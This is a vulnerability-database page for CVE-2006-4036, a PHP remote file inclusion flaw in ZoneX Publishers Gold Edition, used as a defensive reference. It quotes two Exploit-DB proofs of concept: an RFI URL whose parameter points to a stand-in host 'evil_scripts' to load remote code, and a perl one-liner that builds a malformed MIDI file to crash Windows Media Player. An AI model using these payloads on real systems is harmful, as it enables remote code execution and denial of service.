CVE-2006-4036
published 2006-08-09CVE-2006-4036: PHP remote file inclusion vulnerability in includes/usercp_register.php in ZoneMetrics ZoneX Publishers Gold Edition 1.0.3 and earlier allows remote attackers…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.62%
88.1th percentile
PHP remote file inclusion vulnerability in includes/usercp_register.php in ZoneMetrics ZoneX Publishers Gold Edition 1.0.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zonemetrics | zonex_publishers_gold_edition | <= 1.0.3 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows Media Player 9/10 - '.mid' Denial of Service
exploitdb·2006-12-15
CVE-2006-6601 Microsoft Windows Media Player 9/10 - '.mid' Denial of Service
Microsoft Windows Media Player 9/10 - '.mid' Denial of Service
---
#!/bin/sh
# Windows Media MID File Denial Of Service Vulnerability
# Tested:
# Windows Media 10.00.00.4036
# Windows XP SP2
# file "example.mid" (Hex-Code):
# 4D 54 68 64 00 00 00 06 00 00 00 00 00 00
# File size = 14 byte
perl -e 'print "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"' > example.mid
# milw0rm.com [2006-12-15]
Exploit-DB
ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion
exploitdb·2006-08-07
CVE-2006-4036 ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion
ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion
---
///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\
#ZoneX 1.0.3 - Publishers Gold Edition Remote File Inclusion Vulnerability
-
#Author: xoron
-
#script: ZoneX 1.0.3 - Publishers Gold Edition
-
#Class : Remote
-
#cont@ct: x0r0n[at]hotmail[dot]com
-
#CODE: include($phpbb_root_path . 'newsletter/scripts/subscriptions.' .$phpEx)
-
#Exploit: http://www.site.com/[path]/includes/usercp_register.php?phpbb_root_path=http://evil_scripts?
-
#Thanx : WWW.CYBER-WARRiOR.ORG
-
#Greetz: DJR, x-mastER, R3D4C!D and all cyber-warrior users.
///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\
# milw0rm.com [2006-08-07]
No writeups or analysis indexed.
http://secunia.com/advisories/21353http://securityreason.com/securityalert/1348http://www.attrition.org/pipermail/vim/2006-September/001017.htmlhttp://www.securityfocus.com/archive/1/442152/100/0/threadedhttp://www.securityfocus.com/archive/1/444901/100/0/threadedhttp://www.securityfocus.com/bid/19338http://www.vupen.com/english/advisories/2006/3156https://exchange.xforce.ibmcloud.com/vulnerabilities/28223http://secunia.com/advisories/21353http://securityreason.com/securityalert/1348http://www.attrition.org/pipermail/vim/2006-September/001017.htmlhttp://www.securityfocus.com/archive/1/442152/100/0/threadedhttp://www.securityfocus.com/archive/1/444901/100/0/threadedhttp://www.securityfocus.com/bid/19338http://www.vupen.com/english/advisories/2006/3156https://exchange.xforce.ibmcloud.com/vulnerabilities/28223
2006-08-09
Published